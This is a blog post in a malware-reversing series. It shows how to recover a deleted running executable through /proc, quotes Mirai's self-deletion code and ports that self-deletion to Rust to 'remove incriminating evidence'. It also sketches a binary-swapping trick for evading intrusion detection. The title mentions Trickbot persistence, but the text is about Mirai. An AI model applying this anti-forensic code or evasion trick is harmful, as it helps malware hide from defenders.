-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtrickbot-persistence.html
More file actions
210 lines (188 loc) · 7 KB
/
trickbot-persistence.html
File metadata and controls
210 lines (188 loc) · 7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- 2026-04-21 Tue 15:26 -->
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Trickbot persistence.</title>
<meta name="generator" content="Org Mode" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
<meta http-equiv="Content-Security-Policy" content="style-src-elem 'self' https://wmealing.github.io;">
<link rel="stylesheet" href="index.css">
<meta name="author" content="Wade Mealing" />
</head>
<body>
<div id="content" class="content">
<h1 class="title">Trickbot persistence.</h1>
<nav class="navbar-custom">
<div class="navbar-container">
<div class="navbar-brand">
<a href="index.html">Wade Mealing</a>
</div>
<div class="navbar-grid">
<div class="navbar-section">
<a href="systems.html"><h3>Systems</h3></a>
<div class="navbar-tags">
<a href="systems-erlang.html"><span class="navbar-tag">Erlang/OTP</span></a>
<a href="systems-clojure.html"><span class="navbar-tag">Clojure</span></a>
<a href="systems-lfe.html"><span class="navbar-tag">Lisp Flavored Erlang</span></a>
<a href="systems-cellium.html"><span class="navbar-tag">Cellium (TUI Framework)</span></a>
</div>
</div>
<div class="navbar-section">
<a href="security.html"><h3>Security</h3></a>
<div class="navbar-tags">
<a href="security-kernel.html"><span class="navbar-tag">Linux Kernel Analysis</span></a>
<a href="security-ebpf.html"><span class="navbar-tag">eBPF</span></a>
<a href="security-malware.html"><span class="navbar-tag">Malware Reversing</span></a>
<a href="security-rust.html"><span class="navbar-tag">Rust</span></a>
</div>
</div>
<div class="navbar-section">
<a href="tooling.html"><h3>Tooling</h3></a>
<div class="navbar-tags">
<a href="tooling-emacs.html"><span class="navbar-tag">Emacs / Elisp</span></a>
<a href="tooling-cicd.html"><span class="navbar-tag">CI/CD Pipelines</span></a>
<a href="tooling-openscad.html"><span class="navbar-tag">OpenSCAD</span></a>
</div>
</div>
</div>
<div class="navbar-utility">
<a href="rss.xml" class="rss-link">RSS</a>
<div class="navbar-avatar">
<a href="index.html"><img src="apple-touch-icon.png" alt="Avatar"></a>
</div>
</div>
</div>
</nav>
<div id="outline-container-org63ec604" class="outline-2">
<h2 id="org63ec604">What is persistence ?</h2>
<div class="outline-text-2" id="text-org63ec604">
<p>
A system may be rebooted during regular intervals as part of its
lifecycle when a new kernel is updated or if it enters an unknown
state.
</p>
<p>
The author of the trickbot malware code has elected to use the cron
task scheduling service to ensure it will continue to execute
</p>
</div>
</div>
<div id="outline-container-org04bd4db" class="outline-2">
<h2 id="org04bd4db">Recovering an executable file.</h2>
<div class="outline-text-2" id="text-org04bd4db">
<p>
The /proc filesystem will maintain a link to all files opened by an
executing process even if the file has been removed from disk.
</p>
<p>
Each processes open files can be read from /proc/<numeric-pid>/exe
</p>
<pre class="example" id="org496b181">
$ sudo ls -l /proc/975301/exe
lrwxrwxrwx. 1 root root 0 Nov 8 22:50 /proc/975301/exe -> /tmp/.malware/init
</pre>
<p>
This is a regular file, and with root user permissions, the file can
be copied for later inspection.
</p>
<pre class="example" id="org4fa2bef">
$ cat /proc/975301/exec >> ~/captured-executable
</pre>
<p>
If the malware is a scripting language (Mirai is not), the actual
executable script will be available in another location in the
`/proc/<some-pid>/fd/
</p>
<pre class="example" id="org28363c2">
$ sudo ls -l /proc/975301/fd/
total 0
lr-x------. 1 root root 64 Nov 10 01:08 0 -> /dev/null
lrwx------. 1 root root 64 Nov 10 01:08 1 -> 'socket:[38592]'
l-wx------. 1 root root 64 Nov 10 01:08 10 -> /tmp/.malware/script.py
</pre>
</div>
</div>
<div id="outline-container-org510f5da" class="outline-2">
<h2 id="org510f5da">The sample code.</h2>
<div class="outline-text-2" id="text-org510f5da">
<p>
Mirai's self deletion code is simple and unerror checked.
</p>
<pre class="example" id="org8b4fc7c">
// Delete self
unlink(args[0]);
</pre>
<p>
See <a href="https://github.com/wmealing/Mirai-Source-Code/blob/master/mirai/bot/main.c#L61">it in action here</a>.
</p>
<p>
The <a href="https://linux.die.net/man/2/unlink">unlink</a> function deletes a file by name from the file system. It
has a number of possible error conditions, but it appears that the
author did not care about any of them.
</p>
</div>
</div>
<div id="outline-container-org2dd5203" class="outline-2">
<h2 id="org2dd5203">Porting to rust.</h2>
<div class="outline-text-2" id="text-org2dd5203">
<p>
To implement the same functionality in rust we first need to get the
current processes executable file path.
</p>
<p>
Much like all languages, it is the first arguement in the processes
args array.
</p>
<p>
Once we have the program path, it ss a simple matter of using
rusts std::fs remove_file function to delete the file.
</p>
<p>
The process will continue to run normally and the file will be
removed from disk during execution, and the process will continue
to run.
</p>
<pre class="example" id="org117d915">
use std::fs;
fn main() {
//// Delete the executing file to remove incriminating evidence
let argv0 = std::env::args().next().unwrap(); // this will always exist.
let _result = delete_file(&argv0);
}
fn delete_file(filename: &str) -> std::result::Result<(), std::io::Error> {
info!("Deleting binary!");
fs::remove_file(filename)?;
Ok(())
}
</pre>
<p>
Having the executable 'missing' would be one of the big alarm bells
for an intrustion detection system.
</p>
<p>
Perhaps a better option to make this harder to detect would be to
move a legit binary, rename the malware to the exeutable in place
delete the malware then put the original executable back.
</p>
<p>
This would be much harder to detect, especially if it communicated
using the same ports and had the same process name.
</p>
</div>
</div>
<div id="outline-container-org9fa0c19" class="outline-2">
<h2 id="org9fa0c19">Resources:</h2>
<div class="outline-text-2" id="text-org9fa0c19">
<ul class="org-ul">
<li><a href="https://github.com/wmealing/Mirai-Source-Code">Mirai source code</a></li>
</ul>
</div>
</div>
</div>
</body>
</html>